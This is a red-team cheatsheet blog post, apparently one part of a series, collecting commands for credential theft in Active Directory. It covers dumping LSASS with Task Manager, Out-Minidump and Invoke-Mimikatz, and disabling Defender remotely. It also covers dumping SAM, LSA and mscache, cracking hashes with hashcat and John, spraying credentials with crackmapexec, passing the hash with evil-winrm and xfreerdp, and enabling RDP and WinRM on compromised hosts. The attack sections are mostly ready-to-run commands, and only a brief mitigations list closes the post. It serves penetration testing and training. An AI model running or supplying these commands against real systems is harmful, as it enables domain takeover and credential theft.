TL;DR ‘The Credential Theft Shuffle’ is Sean Metcalf’s term. This is just an attempt to put my notes regarding dumping and re-using credentials all in one place.
Welcome to Part VIII of our Cheatsheet Series!
Part I: Mimikatz cheatsheet
Part II: Set-Acl cheatsheet
Part III: Get-Acl cheatsheet
Part IV: Enumerating AD cheatsheet
Part V: Windows reverse shells cheatsheet
Part VI: MS Graph PowerShell cheatsheet
Part VII: Hash cracking cheatsheet
Part VIII: The Credential Theft Shuffle
Part IX: SACLs & Querying Collected Logs
Part X: Setting up a simple AD lab in Azure
Background
I cannot take credit for the term “The Credential Theft Shuffle” as Sean Metcalf coined it years ago. It’s catchy and it encapsulates a red team TTP perfectly so I have been using it ever since.
There’s nothing terribly new in here other than crackmapexec and Out-Minidump that we haven’t touched on in a prior howto somewhere. This is really just putting my notes regarding dumping and re-using creds all in one place.
All these techniques assume that you have Domain User access in AD and gained local administrator access to the system that you are dumping credentials from.
Finding plaintext creds in files
We’ll get started with an obvious one; searching files for passwords stored in cleartext:
Get-ChildItem C:\scripts\* -Recurse | Select-String -Pattern “password” -Context 3
Obviously this sort of things shouldn’t happen, but users are human after all. Hence it’s always worth looking for.
Dumping creds with Task Manager
It sounds obvious, but I have seen a lot of courses fail to mention this stupid simple method of dumping the LSASS. Any local admin can run Task Manager if they have access to the GUI, view all processes, right click on ‘Local Security Authority Process’, and ‘Create dump file’. They can then move the resulting .DMP file offline, load it into Mimikatz, and grab any creds it contains.
Dumping creds with Out-Minidump.ps1
This essentially does the same thing as Task Manager, but is quite handy if all you have is CLI access, for example via evil-winrm. Simply
upload /home/kali/Downloads/exploits/PowerShell/Out-Minidump.ps1
Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump
download C:\Users\vack\Documents\lsass_708.dmp /home/kali/Downloads/Pilfered/lsass_708.dmpOne can then move the resulting .DMP file offline, load it into Mimikatz, and grab any creds it contains.
Reading a LSASS dump file
Earlier we showed two ways to dump LSASS to a *.DMP file. One can read the file offline using mimikatz.exe:
sekurlsa::minidump lsass_708.DMP
sekurlsa::logonpasswords
Dumping creds with Invoke-Mimikatz.ps1
Everyone has their preferences, mine is that I rarely use mimikatz.exe outside of my own workstation VM on test.local. We keep a Windows 10 system around with mimikatz, John, Hashcat, BloodHound, Visual Studio, etc for reading data, compiling stuff, hash cracking, etc. If we were a big outfit we’d have a physical workstation for this sort of thing, but we run this place on a shoe string budget so it’s just a VM.
We prefer to use Invoke-Mimikatz.ps1 for THM, labs, ranges, exams, etc. The classic TTP for this goes
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $true} -ComputerName Exodus
Invoke-Mimikatz -ComputerName Exodus -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'Some other useful Mimikatz commands to put in that third spot are:
vault::cred #dump Credential Manager
lsadump::sam #dump the SAM
lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)Cracking mscache
We first went over mscache while running a lab exercise on HiveNightmare. I have yet to take a course or exam that even mentioned it. The cliff notes, that we learned from CW6 Google and some hands on in the lab, is that mscache is what Windows uses to store domain credentials. It’s used so that after a Domain User has logged onto a workstation initially they can then login afterwards even if the system is disconnected.
The important thing to bear in mind about mscache is that it cannot be used to PTH, as NTLM can. It can only be cracked.
Hashcat:
hashcat -m2100 '$DCC2$10240#jane#cfea5bd6c6471535ce65b0a4425cc97e' /home/kali/Downloads/Wordlists/realhuman_phill.txt --force --potfile-disableJohn:
John --format-mscache2 ./mscache.txt --wordlist=/home/kali/Downloads/Wordlists/JohnList
Dumping creds with crackmapexec
Crackmapexec, like mimikatz, is another one of those incredibly versatile tools. Let’s say you grabbed a username and either a password or a NTLM hash earlier. You can then throw it at every other system in the domain, lab, range, whatever. Not only will crackmapexec show what systems that user can access, it can automatically dump creds from any systems on which that user is a local admin.
The basic syntax is:
crackmapexec smb /home/kali/Downloads/targets.txt -d kinetic -u von -p SpellCast3rOne can leave off the -d part though if you don’t want to specify a domain and crackmapexec will use whatever domain the system is on.
Additional options:
winrm #attempt PSSession
rdp #kinda self explanatory, try to RDP with the provided creds
--local-auth #basically puts .\ in front of the user and tries local auth to each system
-H <NTLM> #PTH
--sam #auto dump the SAM on any systems the creds get local admin on
--lsa #auto dump the LSASS, includes mscache
Crackmapexec is a crossover in this howto as it both dumps and re-uses creds.
Pass-The-Hash (PTH)
PSSession via evil-winrm from Kali:
evil-winrm -i 10.65.1.38 -u administrator -H 861305d859334b557a3341c83be51462RDP PTH from Kali:
xfreerdp /v:10.65.1.38 /u:administrator /pth: 861305d859334b557a3341c83be51462If RDP wasn’t enabled already, just copy/paste this after connecting via evil-winrm:
Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’ -name “fDenyTSConnections” -value 0 ; Enable-NetFirewallRule -DisplayGroup “Remote Desktop”If WinRM wasn’t enabled, copy/paste this after getting a reverse shell, or however you got in initially:
winrm quickconfig -forceRepeat
Once access is gained to a new system the process is repeated. Creds are dumped & re-used.
Sidenote on AD privileges
I am probably preaching to the choir, but one wants to check compromised accounts for any privileges they may hold in AD as well as for access to other systems. One can easily do this with PowerView:
Invoke-ACLScanner | Where-Object {$_.IdentityReference -like “*Mishky*”}This method is simple, quick, and easy however it does not check the groups the given user might be in or groups that those groups are nested in. It works well for CTFs, ranges, etc where the user is only in one or two groups total, one can just run the query for those groups as well.
However in complex domain environments we are partial to Mishky’s version. It leverages Alex Hansen’s Get-ADNestedGroups.ps1 to check everything all at once. I have actually seen a vendor sell a tool that enumerates nested groups in AD for hundreds of dollars a year. Seriously, save your money and just use Get-ADNestedGroups.ps1 to enumerate upwards and use
Get-ADGroupMember -Identity “SSPR” -RecursiveTo enumerate all members of a given group, including nested ones.
Endgame
The goal of ‘The Shuffle’ is of course to eventually pivot to an account that is a Domain Admin, has privileges to add themselves to it, can DCSync, etc. At this point one owns the domain, can dump all user’s NTLM hashes, and can then feed them into Crackstation, hashcat, etc to check for plaintext passwords.
Given human nature an attacker is bound to get lucky and find that Joe in Finance is using the same password on the origination’s bank account that he is using in AD, for example. Password re-use and human nature can vastly expand the attack surface.
Mitigations
- Keep systems up to date on patches
- Don’t let Domain Users be local admins on their workstations
- Don’t let Domain Admins and other highly privileged users get into bad habits, like logging in on random workstations
- Use smartcards for privileged users, disable delegation on their account, and put them in the Privileged User group in AD
- Utilize LAPS
- If you are truly paranoid, LAPS can be leveraged so the helpdesk doesn’t even login to user’s workstations
- Audit for things like who can modify the Domain Admins, who can DCSync, who can push GPOs, etc
References
The Credential Theft Shuffle: https://adsecurity.org/?p=2362
Finding strings in files with PowerShell: https://blog.ironmansoftware.com/daily-powershell/powershell-select-string/
Get-ADUserNestedGroups: http://blog.tofte-it.dk/powershell-get-all-nested-groups-for-a-user-in-active-directory/
